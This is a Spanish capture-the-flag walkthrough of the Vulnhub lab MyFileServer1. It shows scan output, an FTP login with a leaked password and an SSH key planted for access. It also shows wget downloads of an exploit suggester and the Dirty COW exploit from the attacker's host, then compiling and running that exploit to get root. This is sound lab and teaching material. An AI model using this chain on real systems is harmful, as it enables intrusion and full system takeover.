[VLN] MyFileServer1

Hoy vamos a hackear la maquina de Vulnhub llamada MyFileServer1. Podeis descargarla desde el siguiente enlace: MyFileServer1

Enumeration


Empezamos con un nmap para ver que puertos tiene abiertos.

sml@Cassandra:~$ nmap -p- -A 192.168.1.85
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-27 11:03 CET
Nmap scan report for fileserver.home (192.168.1.85)
Host is up (0.00055s latency).
Not shown: 64523 filtered ports, 1004 closed ports
PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx    3 0        0              16 Feb 19 07:48 pub [NSE: writeable]
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.1.148
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp    open  ssh         OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 75:fa:37:d1:62:4a:15:87:7e:21:83:b9:2f:ff:04:93 (RSA)
|   256 b8:db:2c:ca:e2:70:c3:eb:9a:a8:cc:0e:a2:1c:68:6b (ECDSA)
|_  256 66:a3:1b:55:ca:c2:51:84:41:21:7f:77:40:45:d4:9f (ED25519)
80/tcp    open  http        Apache httpd 2.4.6 ((CentOS))
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS)
|_http-title: My File Server
111/tcp   open  rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100003  3,4         2049/udp   nfs
|   100003  3,4         2049/udp6  nfs
|   100005  1,2,3      20048/tcp   mountd
|   100005  1,2,3      20048/tcp6  mountd
|   100005  1,2,3      20048/udp   mountd
|   100005  1,2,3      20048/udp6  mountd
|   100021  1,3,4      40143/udp   nlockmgr
|   100021  1,3,4      44733/tcp6  nlockmgr
|   100021  1,3,4      45664/udp6  nlockmgr
|   100021  1,3,4      60055/tcp   nlockmgr
|   100024  1          34834/udp   status
|   100024  1          39810/udp6  status
|   100024  1          44480/tcp   status
|   100024  1          60715/tcp6  status
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
445/tcp   open  netbios-ssn Samba smbd 4.9.1 (workgroup: SAMBA)
2049/tcp  open  nfs_acl     3 (RPC #100227)
2121/tcp  open  ftp         ProFTPD 1.3.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: ERROR
20048/tcp open  mountd      1-3 (RPC #100005)
Service Info: Host: FILESERVER; OS: Unix

Host script results:
|_clock-skew: mean: -1h50m00s, deviation: 3h10m30s, median: -1s
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.1)
|   Computer name: localhost
|   NetBIOS computer name: FILESERVER\x00
|   Domain name: \x00
|   FQDN: localhost
|_  System time: 2020-03-27T15:34:27+05:30
| smb-security-mode: 
|   account_used: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-03-27T10:04:26
|_  start_date: N/A

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 86.05 seconds
Podemos ver que tiene muchos puertos abiertos, asi que es momento de ver que informacion podemos sacar.

sml@Cassandra:~$ nikto -h http://192.168.1.85
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.85
+ Target Hostname:    192.168.1.85
+ Target Port:        80
+ Start Time:         2020-03-27 11:07:43 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.6 (CentOS)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user 
agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent 
to render the content of the site in a different fashion to the MIME type
+ Apache/2.4.6 appears to be outdated (current is at least Apache/2.4.37). 
Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST, TRACE 
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to 
XST
+ OSVDB-3092: /readme.txt: This might be interesting...
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8724 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time:           2020-03-27 11:08:36 (GMT1) (53 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Nikto detecta el fichero readme.txt el cual si vemos http://192.168.1.85/readme.txt encontramos el siguiente texto: My Password is rootroot1 Seguimos buscando mas informacion que pueda sernos util.

sml@Cassandra:/tmp$ smbmap -H 192.168.1.85
[+] IP: 192.168.1.85:445        Name: fileserver.home                           
        
        Disk                                                    Permissions     
Comment
        ----                                                    -----------     
-------
        print$                                                  NO ACCESS       
Printer Drivers
        smbdata                                                 READ, WRITE     
smbdata
        smbuser                                                 NO ACCESS       
smbuser
        IPC$                                                    NO ACCESS       
IPC Service (Samba 4.9.1)
Podemos ver que en Samba hay 2 carpetas, una llamada smbdata y otra smbuser.

sml@Cassandra:/tmp$ smbmap -H 192.168.1.85 -R
[+] IP: 192.168.1.85:445        Name: fileserver.home                           
        
        Disk                                                    Permissions     
Comment
        ----                                                    -----------     
-------
        print$                                                  NO ACCESS       
Printer Drivers
        smbdata                                                 READ, WRITE     
smbdata
        .\smbdata\*
        dr--r--r--                0 Fri Mar 27 11:23:08 2020    .
        dr--r--r--                0 Tue Feb 18 12:47:54 2020    ..
        dr--r--r--                0 Tue Feb 18 12:48:15 2020    anaconda
        dr--r--r--                0 Tue Feb 18 12:48:15 2020    audit
        fr--r--r--             6120 Tue Feb 18 12:48:16 2020    boot.log
        fr--r--r--              384 Tue Feb 18 12:48:16 2020    btmp
        fr--r--r--             4813 Tue Feb 18 12:48:16 2020    cron
        fr--r--r--            31389 Tue Feb 18 12:48:16 2020    dmesg
        fr--r--r--            31389 Tue Feb 18 12:48:16 2020    dmesg.old
        dr--r--r--                0 Tue Feb 18 12:48:16 2020    glusterfs
        fr--r--r--           292292 Tue Feb 18 12:48:16 2020    lastlog
        fr--r--r--             1982 Tue Feb 18 12:48:16 2020    maillog
        fr--r--r--           684379 Tue Feb 18 12:48:16 2020    messages
        dr--r--r--                0 Tue Feb 18 12:48:16 2020    ppp
        dr--r--r--                0 Tue Feb 18 12:48:16 2020    samba
        fr--r--r--            11937 Tue Feb 18 12:48:16 2020    secure
        fr--r--r--                0 Tue Feb 18 12:48:16 2020    spooler
        fr--r--r--                0 Tue Feb 18 12:48:16 2020    tallylog
        dr--r--r--                0 Tue Feb 18 12:48:16 2020    tuned
        fr--r--r--            25728 Tue Feb 18 12:48:17 2020    wtmp
        fr--r--r--              100 Tue Feb 18 12:48:17 2020    xferlog
        fr--r--r--            10915 Tue Feb 18 12:48:17 2020    yum.log
        fr--r--r--             3906 Wed Feb 19 08:46:38 2020    sshd_config
        .\smbdata\anaconda\*
        dr--r--r--                0 Tue Feb 18 12:48:15 2020    .
        dr--r--r--                0 Fri Mar 27 11:23:08 2020    ..
        fr--r--r--            21532 Tue Feb 18 12:48:15 2020    anaconda.log
        fr--r--r--            66090 Tue Feb 18 12:48:15 2020    syslog
        fr--r--r--            22750 Tue Feb 18 12:48:15 2020    anaconda.xlog
        fr--r--r--            25353 Tue Feb 18 12:48:15 2020    
anaconda.program.log
        fr--r--r--           123159 Tue Feb 18 12:48:15 2020    
anaconda.packaging.log
        fr--r--r--            95767 Tue Feb 18 12:48:15 2020    
anaconda.storage.log
        fr--r--r--             1894 Tue Feb 18 12:48:15 2020    
anaconda.ifcfg.log
        fr--r--r--                0 Tue Feb 18 12:48:15 2020    
ks-script-JI8Xco.log
        fr--r--r--                0 Tue Feb 18 12:48:15 2020    
ks-script-vT7qk9.log
        .\smbdata\audit\*
        dr--r--r--                0 Tue Feb 18 12:48:15 2020    .
        dr--r--r--                0 Fri Mar 27 11:23:08 2020    ..
        fr--r--r--           840450 Tue Feb 18 12:48:16 2020    audit.log
        .\smbdata\samba\*
        dr--r--r--                0 Tue Feb 18 12:48:16 2020    .
        dr--r--r--                0 Fri Mar 27 11:23:08 2020    ..
        dr--r--r--                0 Tue Feb 18 12:48:16 2020    old
        fr--r--r--              168 Tue Feb 18 12:48:16 2020    log.smbd
        dr--r--r--                0 Tue Feb 18 12:48:16 2020    cores
        .\smbdata\samba\cores\*
        dr--r--r--                0 Tue Feb 18 12:48:16 2020    .
        dr--r--r--                0 Tue Feb 18 12:48:16 2020    ..
        dr--r--r--                0 Tue Feb 18 12:48:16 2020    smbd
        .\smbdata\tuned\*
        dr--r--r--                0 Tue Feb 18 12:48:16 2020    .
        dr--r--r--                0 Fri Mar 27 11:23:08 2020    ..
        fr--r--r--            15722 Tue Feb 18 12:48:16 2020    tuned.log
        smbuser                                                 NO ACCESS       
smbuser
        IPC$                                                    NO ACCESS       
IPC Service (Samba 4.9.1)
Despues de revisar todos los puertos lo unico que tenemos es un posible usuario llamado smbuser y el password rootroot1. Probamos en varios servicios, y vemos que en el FTP acepta los credenciales smbuser/rootroot1.

Low shell



sml@Cassandra:~$ ftp 192.168.1.85 
Connected to 192.168.1.85.
220 (vsFTPd 3.0.2)
Name (192.168.1.85:sml): smbuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
Al loguearnos en el FTP como smbuser vemos que aparentemente estamos en su /home, asi que copiamos nuestra clave publica de ssh (id_rsa.pub) en un fichero llamado authorized_keys y subimos dicho fichero a la carpeta .ssh de smbuser a traves del FTP. Creando antes la carpeta .ssh en el FTP como se ve a continuacion.

sml@Cassandra:~$ cp .ssh/id_rsa.pub authorized_keys
sml@Cassandra:~$ ftp 192.168.1.85 
Connected to 192.168.1.85.
220 (vsFTPd 3.0.2)
Name (192.168.1.85:sml): smbuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> mkdir .ssh
257 "/home/smbuser/.ssh" created
ftp> cd .ssh
250 Directory successfully changed.
ftp> put authorized_keys
local: authorized_keys remote: authorized_keys
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
567 bytes sent in 0.00 secs (22.5306 MB/s)
Una vez realizado conectamos por ssh :)

sml@Cassandra:~$ ssh smbuser@192.168.1.85
   
################################################################################
##############
   #                                      Armour Infosec                        
                #
   #                         --------- www.armourinfosec.com ------------       
                #
   #                                    My File Server - 1                      
                #
   #                               Designed By  :- Akanksha Sachin Verma        
                #
   #                               Twitter      :- @akankshavermasv             
                #
   
################################################################################
##############

Last login: Fri Mar 27 17:20:37 2020 from cassandra.home
[smbuser@fileserver ~]$ id
uid=1000(smbuser) gid=1000(smbuser) grupos=1000(smbuser)
[smbuser@fileserver ~]$

Privilege Escalation


Una vez dentro del sistema vamos a descargarnos el script[1] para que nos sugiera algun exploit que pueda funcionarnos en el sistema.

[smbuser@fileserver ~]$ cd /tmp
[smbuser@fileserver tmp]$ wget http://192.168.1.148/lin.sh
--2020-03-27 17:27:52--  http://192.168.1.148/lin.sh
Conectando con 192.168.1.148:80... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 84245 (82K) [application/octet-stream]
Grabando a: “lin.sh”

100%[===========================================================================
=================================================>] 84.245      --.-K/s   en 
0,001s  

2020-03-27 17:27:52 (114 MB/s) - “lin.sh” guardado [84245/84245]

[smbuser@fileserver tmp]$ sh lin.sh

Available information:

Kernel version: 3.10.0
Architecture: x86_64
Distribution: RHEL
Distribution version: 7
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS

Searching among:

73 kernel space exploits
45 user space exploits

Possible Exploits:

[+] [CVE-2016-5195] dirtycow

   Details: 
https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: 
debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10)
.*|2.6.33.9-rt31},[ RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7} 
],ubuntu=16.04|14.04|12.04
   Download URL: https://www.exploit-db.com/download/40611
   Comments: For RHEL/CentOS see exact vulnerable versions here: 
https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2016-5195] dirtycow 2

   Details: 
https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: debian=7|8,[ RHEL=5|6|7 
],ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:
4.4.0-21-generic}
   Download URL: https://www.exploit-db.com/download/40839
   ext-url: https://www.exploit-db.com/download/40847.cpp
   Comments: For RHEL/CentOS see exact vulnerable versions here: 
https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2017-1000367] Sudoer-to-root

   Details: https://www.sudo.ws/alerts/linux_tty.html
   Exposure: probable
   Tags: [ RHEL=7 ]{sudo:1.8.6p7}
   Download URL: 
https://www.qualys.com/2017/05/30/cve-2017-1000367/linux_sudo_cve-2017-1000367.c
   Comments: Needs to be sudoer. Works only on SELinux enabled systems

--SNIP--
Nos sugiere varios, asi que vamos a utilizar[2] [CVE-2016-5195] dirtycow 2.

[smbuser@fileserver tmp]$ wget http://192.168.1.148/40839.c
--2020-03-27 17:30:44--  http://192.168.1.148/40839.c
Conectando con 192.168.1.148:80... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 5006 (4,9K) [application/octet-stream]
Grabando a: “40839.c”

100%[===========================================================================
=================================================>] 5.006       --.-K/s   en 0s 
     

2020-03-27 17:30:44 (756 MB/s) - “40839.c” guardado [5006/5006]

smbuser@fileserver tmp]$ mv 40839.c dirty.c
[smbuser@fileserver tmp]$ gcc -pthread dirty.c -o dirty -lcrypt
[smbuser@fileserver tmp]$ ./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: 
Complete line:
firefart:fiWZ83NyER86M:0:0:pwned:/root:/bin/bash

mmap: 7f5c984d8000
Una vez ejecutado el exploit, abrimos otra conexion ssh (en paralelo) para loguearnos como firefart y tener los privilegios de root.

sml@Cassandra:~$ ssh smbuser@192.168.1.85
[smbuser@fileserver ~]$ su firefart
Contraseña: 
[firefart@fileserver smbuser]# id
uid=0(firefart) gid=0(root) grupos=0(root)
[firefart@fileserver smbuser]# cd /root
[firefart@fileserver ~]# ls
proof.txt
[firefart@fileserver ~]# cat proof.txt 
Best of Luck
af52e0163b03cbf7c6dd146351594a43

End


Y con esto ya seriamos root de la maquina :) [1]https://github.com/mzet-/linux-exploit-suggester/blob/master/linux-exploit-su ggester.sh [2]https://www.exploit-db.com/exploits/40839